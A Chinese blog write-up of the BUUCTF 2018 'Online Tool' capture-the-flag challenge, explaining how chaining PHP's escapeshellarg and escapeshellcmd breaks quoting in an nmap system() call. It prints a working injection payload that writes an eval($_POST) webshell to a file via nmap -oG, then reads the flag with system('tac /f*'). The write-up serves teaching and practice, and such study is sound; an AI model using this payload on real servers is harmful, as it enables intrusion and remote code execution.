[BUUCTF 2018]Online Tool_buuctf 2018 online tool-CSDN博客

<?php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);	//创建沙盒
    chdir($sandbox);	//将当前目录名改为$sandbox
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

$_SERVER 是一个包含了诸如头信息(header)、路径(path)、以及脚本位置(script locations)等等信息的数组。这个数组中的项目由 Web 服务器创建。

在PHP 中用$_SERVER['REMOTE_ADDR'] 取得客户端的 IP地址，但如果客户端是使用代理服务器来访问，那取到的就是代理服务器的 IP 地址，而不是真正的客户端 IP 地址。要想透过代理服务器取得客户端的真实 IP 地址，就要使用$_SERVER['HTTP_X_FORWARDED_FOR']来读取。

如果客户端没有通过代理服务器来访问，那么用$_SERVER[“HTTP_X_FORWARDED_FOR”]取到的值将是空的

这里的$_SERVER对题目没有影响，可以忽略

可以看到用到执行了有关nmap的命令，其中有一个写文件的参数

namp -oG

nmap  xxx -oG 1.txt    就可以将xxx写入1.txt

nmap <?php eval($_POST[1]);?> 1.php 可以将一句话木马写入1.php中了，因此这就是我们的思路

`escapeshellargs()`

函数说明：把字符串转码为可以在 shell 命令里使用的参数

形式：string escapeshellarg ( string $arg )

将给字符串增加一个单引号，并且能引用或者转码任何已经存在的单引号，这样以确保能够直接将一个字符串传入 shell 函数，shell 函数包含 exec(), system() 执行运算符(反引号)

<?php
echo escapeshellarg("DMIND")."\n";	
echo escapeshellarg("DMIND;dmind")."\n";
echo escapeshellarg("DMIND'dmind")."\n";
echo escapeshellarg("'DMIND '");
?>
输出：
'DMIND'		//给字符串增加单引号
'DMIND;dmind'	//只当作一个参数
'DMIND'\''dmind'	//对已经存在的单引号进行转义。 '转化为'\''
''\''DMIND '\'''	//  '转化为'\''

可以看出escashellargs()针对了单引号

`escapeshellcmd()`

函数说明：shell 元字符转义

形式：escapeshellcmd ( string $command ) : string

对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。此函数保证用户输入的数据在传送到 exec() 或 system() 函数，或者执行操作符之前进行转义

反斜线（\）会在以下字符之前插入：
& # ; ` | * ? ~ < > ^ ( ) [ ] { } $ \ , \x0A 和 \xFF

' 和 " 仅在不配对的时候被转义

<?php
echo escapeshellcmd("DMIND"))."\n";
echo escapeshellcmd("DMIND;dmind")."\n";
echo escapeshellcmd("DMIND'dmind")."\n";
echo escapeshellcmd("'DMIND '");
?>

输出：
DMIND
DMIND\;dmind	//特殊字符会加上转义符： \
DMIND\'dmind	//不配对的单引号加上转义符：\
'DMIND '		//配对的则不会加

这两个函数单独使用没有问题，但当先使用escapeshellargs()再将值传给escapeshellcmd()时就会发生问题

<?php
$a=escapeshellarg("127.0.0.1' -v -d a=1");
echo $a."\n";
echo escapeshellcmd($a)."\n";
?>
输出：
'127.0.0.1'\'' -v -d a=1'
'127.0.0.1'\\'' -v -d a=1\'
如果前面拼接一个curl，那就会变成:
curl 127.0.0.1\ -v -d a=1\'

需要注意：引号能闭合的就闭合，\\会被当作\ ，而'\\'就被当作\\

利用escapeshellcmd()和escapeshellarg()处理引号方式的差别，就可以构造语句导致引号之间闭合，从而使本来当作字符的字符串成为了能执行命令的语句

这题，假如我们构造

' <?php eval($_POST[1]);?> -oG 3.php '

经过两个函数的处理后变为''\\'' \<\?php eval$\$_POST\[1\]$\;\?\> -oG 3.php '\\'''
将该闭合的引号闭合上，忽略这些闭合的引号就变为了：
\ <?php eval($_POST[1]);?> -oG 3.php \\
拼接上题目的语句

nmap -T5 -sT -Pn --host-timeout 2 -F \ <?php eval($_POST[1]);?> -oG 3.php \\

在这里插入图片描述
最后访问页面返回的沙盒目录名与文件名，执行system("tac /f*");即可

参考：谈谈escapeshellarg参数绕过和注入的问题